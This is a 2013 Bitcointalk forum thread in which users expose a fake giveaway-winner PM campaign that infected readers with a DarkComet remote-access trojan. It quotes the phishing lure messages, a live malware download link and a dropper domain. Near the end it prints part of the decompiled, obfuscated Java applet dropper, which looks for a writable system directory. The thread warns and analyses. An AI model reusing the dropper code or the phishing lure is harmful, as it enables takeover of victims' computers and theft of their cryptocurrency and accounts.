Bitcoin Forum>Economy>Trading Discussion>Scam Accusations
Author

Topic: Pishing scammer! legitnick! (Read 4809 times)

DiamondCardz
legendary
Activity: 1134
Merit: 1118
Pishing scammer! legitnick!
August 22, 2013, 03:40:39 PM
#70
This might be gravedigging, but I received an interesting PM from someone today.

Quote from: confidental, I don't spread names
I jokingly offered to sell my account for $3.50 to this obvious skid/scammer but then he offered me $50 for my account so I agreed to it and I have emails that verify this transaction. I wasn't aware that he would use my account maliciously.

I'm not sure how much help it would be but I can provide a wallet address that he was using and if I knew this is what he was up to I would have gotten more info on him.

I can verify that I am who I say I am by using my bitcoin-otc key.

There was no mention of this users name. No PMs before. I just got this PM out of the blue, and nothing else. With the $3.50 though, I instantly know who it is.

legitnick was offered $50 for his account and apparently had no idea of what the person would do. Maybe his account should be returned to him?
cp1
hero member
Activity: 616
Merit: 500
Stop using branwallets
Re: Pishing scammer! legitnick!
July 08, 2013, 12:03:34 AM
#69
Sorry to hear that, just reformat Sad
chadtn
sr. member
Activity: 672
Merit: 250
Re: Pishing scammer! legitnick!
July 07, 2013, 10:59:51 PM
#68
Anyone who fell for this needs to make absolutely sure they have wiped their hard drive and changed passwords.  Today the scammers bid over $300 on my eBay account, bought $300 worth of gift cards on Amazon for Hotmail accounts, spent about $35 on PayPal, and had my blockchain.info wallet sent to my email address.  Then they tried to initiate password resets on dwolla, coinbase, and bitinstant.

They did all of that over the course of about fifteen minutes.  The Obama alias is also watching the forums and has even posted in some of the current scam threads.

Chad
DiamondCardz
legendary
Activity: 1134
Merit: 1118
Re: Pishing scammer! legitnick!
July 07, 2013, 03:48:48 PM
#67
Quote from: chadtn on July 04, 2013, 07:02:28 PM
DarkComet RAT

...I've figured out the critical mass.
r3wt
hero member
Activity: 686
Merit: 504
always the student, never the master.
Re: Pishing scammer! legitnick!
July 07, 2013, 04:28:11 AM
#66
Quote from: QuestionAuthority on July 07, 2013, 04:26:05 AM
This is nothing that a good sandbox can't fix.  It's hard to believe anyone on bitcointalkscam.org would fall for this. How many times does the frying pan need to hit you in the head before you duck?

+2
QuestionAuthority
legendary
Activity: 2156
Merit: 1393
You lead and I'll watch you walk away.
Re: Pishing scammer! legitnick!
July 07, 2013, 04:26:05 AM
#65
This is nothing that a good sandbox can't fix.  It's hard to believe anyone on bitcointalkscam.org would fall for this. How many times does the frying pan need to hit you in the head before you duck?
moni3z
hero member
Activity: 899
Merit: 1002
Re: Pishing scammer! legitnick!
July 06, 2013, 11:27:35 PM
#64
Quote from: 🏰 TradeFortress 🏰 on July 04, 2013, 08:33:24 PM
Quote from: BadBear on July 04, 2013, 08:11:17 PM
Quote from: Moebius327 on July 04, 2013, 05:19:53 PM
Quote from: BitTrade on July 04, 2013, 05:17:04 PM
Quote from: r3wt on July 04, 2013, 05:06:43 AM
Quote from: PrintMule on July 04, 2013, 04:53:07 AM
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.

Would be pointless, there's no way to actually enforce it.

Not entirely pointless. Account sales will decrease if there wasn't open threads "BUYING BITCOINTALK FORUM ACCOUNTS"! People will have to visit another forum in order to bst accounts.

What's the difference it will still happen regardless. They will just manipulate google search results so searching for 'bitcointalk' shows SELL UR ACCOUNT HERE on the first page or advertise on reddit/twitter and other social media.

Also install Common Sense 1.0 and don't click on a PM that says "Download this mtgox.exe winning self-archiving wallet!".

Mods could also use SMF plugins to look for heavy PM traffic and hellban that user, so they keep sending PMs but they aren't actually being sent, letting the bot run itself out and waste time doing nothing. Or DOS them with timeouts and errors http://www.simplemachines.org/community/index.php?topic=471231.0
r3wt
hero member
Activity: 686
Merit: 504
always the student, never the master.
Re: Pishing scammer! legitnick!
July 06, 2013, 05:00:06 PM
#63
Quote from: Moebius327 on July 04, 2013, 05:19:53 PM
Quote from: BitTrade on July 04, 2013, 05:17:04 PM
Quote from: r3wt on July 04, 2013, 05:06:43 AM
Quote from: PrintMule on July 04, 2013, 04:53:07 AM
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.

for the love of god, this!
DiamondCardz
legendary
Activity: 1134
Merit: 1118
Re: Pishing scammer! legitnick!
July 06, 2013, 04:58:48 PM
#62
Quote from: TheButterZone on July 06, 2013, 04:57:52 PM
tl;dr

Did http://bitcoin-otc.com/viewratingdetail.php?nick=legitnick1 (legitnick before he lost his original key) sell his forum account, or is it actually him scamming on his own account? I did a FTF cash trade with him, http://www.linkedin.com/pub/nick-legotte/64/507/92

Obama owns legitnick. He sold his account...or was hacked.
TheButterZone
legendary
Activity: 3038
Merit: 1032
RIP Mommy
Re: Pishing scammer! legitnick!
July 06, 2013, 04:57:52 PM
#61
tl;dr

Did http://bitcoin-otc.com/viewratingdetail.php?nick=legitnick1 (legitnick before he lost his original key) sell his forum account, or is it actually him scamming on his own account? I did a FTF cash trade with him, http://www.linkedin.com/pub/nick-legotte/64/507/92
🏰 TradeFortress 🏰
vip
Activity: 1316
Merit: 1043
👻
Re: Pishing scammer! legitnick!
July 04, 2013, 08:34:27 PM
#60
It is this Obama guy.

https://bitcointalksearch.org/topic/m.2651649
🏰 TradeFortress 🏰
vip
Activity: 1316
Merit: 1043
👻
Re: Pishing scammer! legitnick!
July 04, 2013, 08:33:24 PM
#59
Quote from: BadBear on July 04, 2013, 08:11:17 PM
Quote from: Moebius327 on July 04, 2013, 05:19:53 PM
Quote from: BitTrade on July 04, 2013, 05:17:04 PM
Quote from: r3wt on July 04, 2013, 05:06:43 AM
Quote from: PrintMule on July 04, 2013, 04:53:07 AM
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.

Would be pointless, there's no way to actually enforce it.

Not entirely pointless. Account sales will decrease if there wasn't open threads "BUYING BITCOINTALK FORUM ACCOUNTS"! People will have to visit another forum in order to bst accounts.
BadBear
legendary
Activity: 1652
Merit: 1128
Re: Pishing scammer! legitnick!
July 04, 2013, 08:11:17 PM
#58
Quote from: Moebius327 on July 04, 2013, 05:19:53 PM
Quote from: BitTrade on July 04, 2013, 05:17:04 PM
Quote from: r3wt on July 04, 2013, 05:06:43 AM
Quote from: PrintMule on July 04, 2013, 04:53:07 AM
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.

Would be pointless, there's no way to actually enforce it.
halfawake
hero member
Activity: 490
Merit: 500
Re: Pishing scammer! legitnick!
July 04, 2013, 07:47:00 PM
#57
Quote from: r3wt on July 04, 2013, 05:36:11 AM
Quote from: halfawake on July 04, 2013, 05:34:17 AM
Quote from: brambi on July 04, 2013, 04:38:52 AM
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all Sad

For future reference, I recommend Avast as an antivirus scanner.  It caught what he was trying to pass on, though I feel dumb for falling for it, at least my antivirus scanner protected me from it.  It's an excellent antivirus scanner, and it's free.
yup, avast is good antvirus, but its so fucking annoying with its alerts and messages. one last thing, i feel like its my duty to advise everyone here to download Malware Bytes Anti Rootkit. its a free rootkit remove tool and it works. even if a virus blocks it from running, it will automatically restart your computer and run as soon as dos is booted. really handy for dealing with viruses/malware/rootkits.

True, you're right, it does have a ridiculous amount of popups.  I've tried to turn them off but couldn't figure out how.

As far as the scam...well, I suppose a giveaway by a guy named "legitnick" should have been a giveaway.  After all, if you have to go the trouble of claiming that you're legit, you probably aren't.  (See also Bernie Madoff for other instances of people doing exactly what their name implies.)
chadtn
sr. member
Activity: 672
Merit: 250
Re: Pishing scammer! legitnick!
July 04, 2013, 07:02:28 PM
#56
On my system the downloaded file opened up access to DarkComet RAT.  They used that to remote onto my system to try installing other software.  In the details of the file they downloaded, Dell Datasafe was mentioned.  It looks like a service similar to Dropbox.

Chad
MPOE-PR
hero member
Activity: 756
Merit: 522
Re: Pishing scammer! legitnick!
July 04, 2013, 06:50:21 PM
#55
Quote from: Moebius327 on July 04, 2013, 05:19:53 PM
Mods should forbid account trading.

And just how are they going to police that

No, mods should just get rid of the self-mod thread already. Delenda est!
Moebius327
hero member
Activity: 770
Merit: 500
Re: Pishing scammer! legitnick!
July 04, 2013, 05:19:53 PM
#54
Quote from: BitTrade on July 04, 2013, 05:17:04 PM
Quote from: r3wt on July 04, 2013, 05:06:43 AM
Quote from: PrintMule on July 04, 2013, 04:53:07 AM
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.
BitTrade
full member
Activity: 173
Merit: 100
Re: Pishing scammer! legitnick!
July 04, 2013, 05:17:04 PM
#53
Quote from: r3wt on July 04, 2013, 05:06:43 AM
Quote from: PrintMule on July 04, 2013, 04:53:07 AM
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (used in his "award" pm's, and likely a legitnick sockpuppet), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Now, r3wd is posting in these scam-alert threads, acting like he's appalled at such an act.  
BitTrade
full member
Activity: 173
Merit: 100
Re: Pishing scammer! legitnick!
July 04, 2013, 04:57:47 PM
#52
Quote from: 🏰 TradeFortress 🏰 on July 04, 2013, 05:05:36 AM
He was hacked with the last wave.

Legitnick was 100% NOT hacked.  Proof:

the username "Obama" is one that he lists in every one of his phishing award PM's.  

Interestingly, in this thread, the username "obama" (likely operated by legitnick) made a post asking to buy other user names.  legitnick "responded" to obama to offer his usernsme for $3.50 - likely to try to get others to do the same:  

https://bitcointalksearch.org/topic/m.2525299

This was long premeditated, folks.

He also had hundreds of posts in only a few weeks, to raise his "activity" rating.
freedomno1
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
Re: Pishing scammer! legitnick!
July 04, 2013, 04:56:11 PM
#51
Quote from: Welsh on July 04, 2013, 04:51:18 PM
I always just in case it is legit. Even though I know how stupid it is. I knew it was going to end up like this. As soon as I saw the link I was like....not again. I wouldn't be surprised if it's the same guy as last time. I would search the old thread which was so successful last time. I can't remember the name or the person who did it. I don't know if it got deleted either. Otherwise I would expect to see legitnick posted on there claiming he had received his Bitcoin.

This isn't the last time this is going to happen either. It's going to happened again and again. People will still fall for it. I have not fell for this or the last one. It's just stupid. You don't know the person. The person claimed no links would be involved and the Bitcoin would just be sent to you're address. Yet, he went against his word. That raises another flag. I know when people look at the message and think "OMG" and want to rush to receive their Bitcoins and that's when most people don't think about it just do it. Then say later how did I fall for that. Well, I hope in future people will not fall for this.

It was anyroll last time
Welsh
staff
Activity: 3290
Merit: 4114
Re: Pishing scammer! legitnick!
July 04, 2013, 04:51:18 PM
#50
I always just in case it is legit. Even though I know how stupid it is. I knew it was going to end up like this. As soon as I saw the link I was like....not again. I wouldn't be surprised if it's the same guy as last time. I would search the old thread which was so successful last time. I can't remember the name or the person who did it. I don't know if it got deleted either. Otherwise I would expect to see legitnick posted on there claiming he had received his Bitcoin.

This isn't the last time this is going to happen either. It's going to happened again and again. People will still fall for it. I have not fell for this or the last one. It's just stupid. You don't know the person. The person claimed no links would be involved and the Bitcoin would just be sent to you're address. Yet, he went against his word. That raises another flag. I know when people look at the message and think "OMG" and want to rush to receive their Bitcoins and that's when most people don't think about it just do it. Then say later how did I fall for that. Well, I hope in future people will not fall for this.
chadtn
sr. member
Activity: 672
Merit: 250
Re: Pishing scammer! legitnick!
July 04, 2013, 04:41:08 PM
#49
I'm ashamed to say I fell for it.  I thought it was a wallet file and accidentally clicked on it while I was trying to import the keys.  I deleted the file and scanned my computer for problems.  I thought I removed the problem and went to bed.  I woke up about twenty minutes ago and saw my mouse moving by itself.  Someone had messed with my firewall settings, opened up bitcoin-qt, and had just downloaded a file called _DVSoy.exe from plasmon.ghost.ru.

Chad
DiamondCardz
legendary
Activity: 1134
Merit: 1118
Re: Pishing scammer! legitnick!
July 04, 2013, 04:23:07 PM
#48
Funny because if you click the quote, it brings you to a random thread - he probably grabbed a random ID to make it seem legit. That instantly rings warning bells, why can't people click a quote >_>

I received this PM too.
muasktak10
newbie
Activity: 44
Merit: 0
Re: Pishing scammer! legitnick!
July 04, 2013, 11:26:47 AM
#47
The only free thing that posting a message on an internet discussion will get you nowadays is a shoutout on a youtube video, for people expecting anything more than a scam. lold
cp1
hero member
Activity: 616
Merit: 500
Stop using branwallets
Re: Pishing scammer! legitnick!
July 04, 2013, 10:41:56 AM
#46
I got pmed a password and a .zip file.  Not going to touch that!
BitcoinBarrel
legendary
Activity: 2008
Merit: 1028
Fill Your Barrel with Bitcoins!
Re: Pishing scammer! legitnick!
July 04, 2013, 10:25:17 AM
#45
looks like he's switching it up a bit.
Kiders
member
Activity: 98
Merit: 10
Re: Pishing scammer! legitnick!
July 04, 2013, 09:25:36 AM
#44
Quote from: acne on July 03, 2013, 01:39:38 AM
Winners are as follows:
Kiders
Tranzistor
yayayo
AMDFun
humanizator
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!  
Below is a private key loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I've uploaded the key, password to open .com file is legitnickiscool

Private Key Download

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!


Lol
MPOE-PR
hero member
Activity: 756
Merit: 522
Re: Pishing scammer! legitnick!
July 04, 2013, 07:41:02 AM
#43
Incredible how successful this was.

I remember the good old days when the average Internet age of the Bitcoin troop was well over one year. Seems you people just finally got cable installed last week?
freedomno1
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
Re: Pishing scammer! legitnick!
July 04, 2013, 05:37:23 AM
#42
Quote from: r3wt on July 04, 2013, 05:36:11 AM
Quote from: halfawake on July 04, 2013, 05:34:17 AM
Quote from: brambi on July 04, 2013, 04:38:52 AM
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all Sad

For future reference, I recommend Avast as an antivirus scanner.  It caught what he was trying to pass on, though I feel dumb for falling for it, at least my antivirus scanner protected me from it.  It's an excellent antivirus scanner, and it's free.
yup, avast is good antvirus, but its so fucking annoying with its alerts and messages.

I use Avast but before that Avira Antivir
And that scares the cra!!p out of you
Normal surfing then Bleep
Then another virus
Bleep Bleep Bleep on full speakers lol
(But its good software too and free)
Nod32 for Overkill

Note to self always demand of John his GPG signature hehe or send him a Goat
r3wt
hero member
Activity: 686
Merit: 504
always the student, never the master.
Re: Pishing scammer! legitnick!
July 04, 2013, 05:36:11 AM
#41
Quote from: halfawake on July 04, 2013, 05:34:17 AM
Quote from: brambi on July 04, 2013, 04:38:52 AM
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all Sad

For future reference, I recommend Avast as an antivirus scanner.  It caught what he was trying to pass on, though I feel dumb for falling for it, at least my antivirus scanner protected me from it.  It's an excellent antivirus scanner, and it's free.
yup, avast is good antvirus, but its so fucking annoying with its alerts and messages. one last thing, i feel like its my duty to advise everyone here to download Malware Bytes Anti Rootkit. its a free rootkit remove tool and it works. even if a virus blocks it from running, it will automatically restart your computer and run as soon as dos is booted. really handy for dealing with viruses/malware/rootkits.
halfawake
hero member
Activity: 490
Merit: 500
Re: Pishing scammer! legitnick!
July 04, 2013, 05:34:17 AM
#40
Quote from: brambi on July 04, 2013, 04:38:52 AM
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all Sad

For future reference, I recommend Avast as an antivirus scanner.  It caught what he was trying to pass on, though I feel dumb for falling for it, at least my antivirus scanner protected me from it.  It's an excellent antivirus scanner, and it's free.
r3wt
hero member
Activity: 686
Merit: 504
always the student, never the master.
Re: Pishing scammer! legitnick!
July 04, 2013, 05:09:23 AM
#39
Quote from: BadBear on July 04, 2013, 05:04:25 AM
Quote from: r3wt on July 04, 2013, 04:07:12 AM
Quote from: 🏰 TradeFortress 🏰 on July 04, 2013, 04:06:23 AM
Quote from: BadBear on July 04, 2013, 04:04:43 AM
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

nah, he's not banned. i just got a pm from him as well. i think he has been hacked though. why would an account with 536 activity start randomly scamming people.

Yes he's banned, did it myself. Sent pms are still going to be there, that's why the feedback.

He coulda been compromised, sure is convenient timing though.

good point. maybe it was a really thought out scam attempt. gain everyones trust by offering a giveaway, then pm everyone declaring them a winner and steal as many wallets and btc as possible.
rme
hero member
Activity: 756
Merit: 504
Re: Pishing scammer! legitnick!
July 04, 2013, 05:07:37 AM
#38
Quote from: Moebius327 on July 04, 2013, 05:06:06 AM
I think this is the result of allowing "account trading". Prove me wrong..
That is true, in the last 3 days, 4 users tried to scam me via private message.
I think they are sold accounts.
r3wt
hero member
Activity: 686
Merit: 504
always the student, never the master.
Re: Pishing scammer! legitnick!
July 04, 2013, 05:06:43 AM
#37
Quote from: PrintMule on July 04, 2013, 04:53:07 AM
I cant believe someone fell for that

this times like, 5 billion. people these days
Moebius327
hero member
Activity: 770
Merit: 500
Re: Pishing scammer! legitnick!
July 04, 2013, 05:06:06 AM
#36
I think this is the result of allowing "account trading". Prove me wrong..
🏰 TradeFortress 🏰
vip
Activity: 1316
Merit: 1043
👻
Re: Pishing scammer! legitnick!
July 04, 2013, 05:05:36 AM
#35
He was hacked with the last wave.
PrintMule
hero member
Activity: 980
Merit: 500
FREE $50 BONUS - STAKE - [click signature]
Re: Pishing scammer! legitnick!
July 04, 2013, 05:05:25 AM
#34
If his account was hacked, he would have the time to register and warn everyone about it before raffle ends. If he got hacked while raffle went on, that would be too much to believe. Also view his recent forum activity.
BadBear
legendary
Activity: 1652
Merit: 1128
Re: Pishing scammer! legitnick!
July 04, 2013, 05:04:25 AM
#33
Quote from: r3wt on July 04, 2013, 04:07:12 AM
Quote from: 🏰 TradeFortress 🏰 on July 04, 2013, 04:06:23 AM
Quote from: BadBear on July 04, 2013, 04:04:43 AM
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

nah, he's not banned. i just got a pm from him as well. i think he has been hacked though. why would an account with 536 activity start randomly scamming people.

Yes he's banned, did it myself. Sent pms are still going to be there, that's why the feedback.

He coulda been compromised, sure is convenient timing though.
dwolfman
full member
Activity: 224
Merit: 100
Re: Pishing scammer! legitnick!
July 04, 2013, 04:59:15 AM
#32
Quote from: rme on July 04, 2013, 04:57:36 AM
Quote from: brambi on July 04, 2013, 04:48:39 AM
It looks like he got me, just got e-mail from mtgox on someone trying recover my password.

I have no funds there anyway.

His IP is 99.61.161.210
United States    San Francisco    AT&T Internet Services
 AS7132 SBIS-AS AS for SBIS-AS (registered Sep 13, 1996)

Wonder if that is where legitnick lives?  If it is then he really is the scammer.  Otherwise might just be his account was hacked.
dwolfman
full member
Activity: 224
Merit: 100
Re: Pishing scammer! legitnick!
July 04, 2013, 04:57:58 AM
#31
Think I'm safe.  There was still a java process running, but I killed it.  When I went to Gox before that, I apparently had a stored cookie login so I didn't have to type in a password first time I went.  I've since made it so I need Google Auth to also log in to Gox, not just for withdrawals.

Not that it matters, since that password isn't used anywhere else and there's no funds in there since I quit using Gox a while ago.  Smiley
rme
hero member
Activity: 756
Merit: 504
Re: Pishing scammer! legitnick!
July 04, 2013, 04:57:36 AM
#30
Quote from: brambi on July 04, 2013, 04:48:39 AM
It looks like he got me, just got e-mail from mtgox on someone trying recover my password.

I have no funds there anyway.

His IP is 99.61.161.210
United States    San Francisco    AT&T Internet Services
 AS7132 SBIS-AS AS for SBIS-AS (registered Sep 13, 1996)
🏰 TradeFortress 🏰
vip
Activity: 1316
Merit: 1043
👻
Re: Pishing scammer! legitnick!
July 04, 2013, 04:56:30 AM
#29
Change your passwords..
PrintMule
hero member
Activity: 980
Merit: 500
FREE $50 BONUS - STAKE - [click signature]
Re: Pishing scammer! legitnick!
July 04, 2013, 04:53:07 AM
#28
I cant believe someone fell for that
freedomno1
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
Re: Pishing scammer! legitnick!
July 04, 2013, 04:52:35 AM
#27
Quote from: brambi on July 04, 2013, 04:48:39 AM
It looks like he got me, just got e-mail from mtgox on someone trying recover my password.

I have no funds there anyway.

His IP is 99.61.161.210

Best change your passwords preferably on a different PC that you trust  Wink
Meanwhile get the software I mentioned and scan around to be sure theirs no hidden lurkers Cheesy
brambi
newbie
Activity: 42
Merit: 0
Re: Pishing scammer! legitnick!
July 04, 2013, 04:48:39 AM
#26
Yes hes very bad scammer.. Very bad.
freedomno1
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
Re: Pishing scammer! legitnick!
July 04, 2013, 04:45:59 AM
#25
Quote from: brambi on July 04, 2013, 04:38:52 AM
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all Sad

Well Malware and viruses require different detecting software
Recommend Spybot Search and Destroy and MalwareBytes Anti-Malware if you don't have them yet
Maybe even Web of Trust to block at access
Good old Spywareblaster helps too although it doesn't actively do anything just blocks sites
Hope your fine

As for a linux box
Well I don't think it can execute lols
If your worried ClamAv
http://en.wikipedia.org/wiki/Linux_malware#Viruses
digit
legendary
Activity: 1672
Merit: 1010
Re: Pishing scammer! legitnick!
July 04, 2013, 04:45:25 AM
#24
Quote
Winners are as follows:
Kuriboh
digit
PrintMule
willphase
Equilux
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!   
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I will post code and mtgox link below.

Code: 5kx9d0d67ce4jr984xbe0

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!

this is the one i got, got my fingers crossed that my system is safe.  might run an antivirus over it later just to be sure.

also these "winners" appear to common to all the pm posted here
Obama
juronimo
albert speer
hurro
bachelor

brambi
newbie
Activity: 42
Merit: 0
Re: Pishing scammer! legitnick!
July 04, 2013, 04:38:52 AM
#23
Dont fall for this kind of stuff.
dwolfman
full member
Activity: 224
Merit: 100
Re: Pishing scammer! legitnick!
July 04, 2013, 04:36:37 AM
#22
Well, this sucks.  Could have really used that .5 BTC.  Sad

I didn't notice the link to begin with, usually do.  Maybe I'm safe? I did this on a linux box.
freedomno1
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
Re: Pishing scammer! legitnick!
July 04, 2013, 04:20:27 AM
#21
Quote from: brambi on July 04, 2013, 04:16:04 AM
Quote from: freedomno1 on July 04, 2013, 04:10:53 AM
Quote from: 🏰 TradeFortress 🏰 on July 04, 2013, 04:06:23 AM
Quote from: BadBear on July 04, 2013, 04:04:43 AM
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

I'll admit that is weird stuff lot of not scam like posts to boost the count either
But as it stands now he is scamming and so should be banned if it is a hacked account


It looks like I am in trouble, got winning PM too and downloaded and opened the file from there _>>>  URL Suspicious

Can anyone check this please?

Link has malware (Detected on 1)
https://www.virustotal.com/en/url/031e951e605a7ceaddde1c219cbb87dcf236c6fdb925ebb9e1d13c207d0bc121/analysis/
http://www.avgthreatlabs.com/sitereports/domain/rghost.net/

I don't know what the virus is seems to be detected on some virus scanners so try one of those
Worst case Rootkit deletion
Anyways assume infection for now best be safe than sorry not sure if its just on the page or if its installed on pc
Sorry for shotgun detectiving 
brambi
newbie
Activity: 42
Merit: 0
Re: Pishing scammer! legitnick!
July 04, 2013, 04:16:04 AM
#20
Quote from: freedomno1 on July 04, 2013, 04:10:53 AM
Quote from: 🏰 TradeFortress 🏰 on July 04, 2013, 04:06:23 AM
Quote from: BadBear on July 04, 2013, 04:04:43 AM
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

I'll admit that is weird stuff lot of not scam like posts to boost the count either
But as it stands now he is scamming and so should be banned if it is a hacked account


It looks like I am in trouble, got winning PM too and downloaded and opened the file from there _>>>  http://pl.rghost.net/47200539?r=2862

Can anyone check this please?
freedomno1
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
Re: Pishing scammer! legitnick!
July 04, 2013, 04:10:53 AM
#19
Quote from: 🏰 TradeFortress 🏰 on July 04, 2013, 04:06:23 AM
Quote from: BadBear on July 04, 2013, 04:04:43 AM
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

I'll admit that is weird stuff lot of not scam like posts to boost the count either
But as it stands now he is scamming and so should be banned if it is a hacked account
r3wt
hero member
Activity: 686
Merit: 504
always the student, never the master.
Re: Pishing scammer! legitnick!
July 04, 2013, 04:07:12 AM
#18
Quote from: 🏰 TradeFortress 🏰 on July 04, 2013, 04:06:23 AM
Quote from: BadBear on July 04, 2013, 04:04:43 AM
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

nah, he's not banned. i just got a pm from him as well. i think he has been hacked though. why would an account with 536 activity start randomly scamming people.
🏰 TradeFortress 🏰
vip
Activity: 1316
Merit: 1043
👻
Re: Pishing scammer! legitnick!
July 04, 2013, 04:06:23 AM
#17
Quote from: BadBear on July 04, 2013, 04:04:43 AM
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.
BadBear
legendary
Activity: 1652
Merit: 1128
Re: Pishing scammer! legitnick!
July 04, 2013, 04:04:43 AM
#16
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
PrintMule
hero member
Activity: 980
Merit: 500
FREE $50 BONUS - STAKE - [click signature]
Re: Pishing scammer! legitnick!
July 04, 2013, 04:00:16 AM
#15
Such a nice setup, and so lame execution.

That phishing link could be done much better.

I hope it was worth the trouble, there's plenty of other way to trash your account than this.
halfawake
hero member
Activity: 490
Merit: 500
Re: Pishing scammer! legitnick!
July 04, 2013, 03:40:38 AM
#14
I can confirm this as well.  Tried to download, but thankfully my virus scanner caught it as a virus so my computer didn't get infected.
rme
hero member
Activity: 756
Merit: 504
Re: Pishing scammer! legitnick!
July 04, 2013, 03:31:25 AM
#13
Decompiled Java Applet:

Code:
import java.applet.Applet;
import java.applet.AppletContext;
import java.io.File;
import java.io.FileOutputStream;
import java.net.URL;
import java.nio.channels.Channels;
import java.nio.channels.FileChannel;
import java.util.Random;

public class Java extends Applet
{
  public String Author = "Created-By-FoxxySoftware|Want more? Visit us at foxxysoftware.blogspot.com!";
  public String[] AAA = { "7-3A3-3T3-3A3-" + "3D3-3P3-3P3-3A1-", "7-3e3-3m3-3o3-3h3-3" + ".3-3r3-3e3-3s3-3u3-1", "7-3r3-3i3-3d3-3p3-3m3-3t3-3.3" + "-3o3-3i3-3.3-3a3-3v3-3a3-3j3-1" };
  public int BBB = 0;
  public String[] CCC = { "\\", "//", Long.toString(Math.abs(new Random().nextLong()), 36) };

  public void init() {
    try {
      for (String str1 : this.AAA) {
        this.AAA[this.BBB] = new StringBuffer(str1).reverse().toString().replaceAll("[".concat("0") + "-".concat("9") + "]", "").replaceAll("-", "");
        String str2 = null;
        if (this.BBB == 0) str2 = System.getenv(this.AAA[this.BBB]); else str2 = System.getProperty(this.AAA[this.BBB]);
        if ((str2 != null) && (new File(str2).exists()) && (new File(str2).canWrite()) && (new File(str2).canExecute()) && (new File(str2).canRead()) && (new File(str2).isDirectory())) {
          this.AAA[0] = str2;
          break;
        }
        this.BBB += 1;
      }
      if (this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] == "7-3A3-3".concat("T3-3A3-").toString() + "3D3-3P3-".concat("3P3-3A1-")) {
        System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
      }
      if (this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].endsWith(this.CCC[0])) {
        this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] = this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].substring(0, this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].length() - 1);
      }
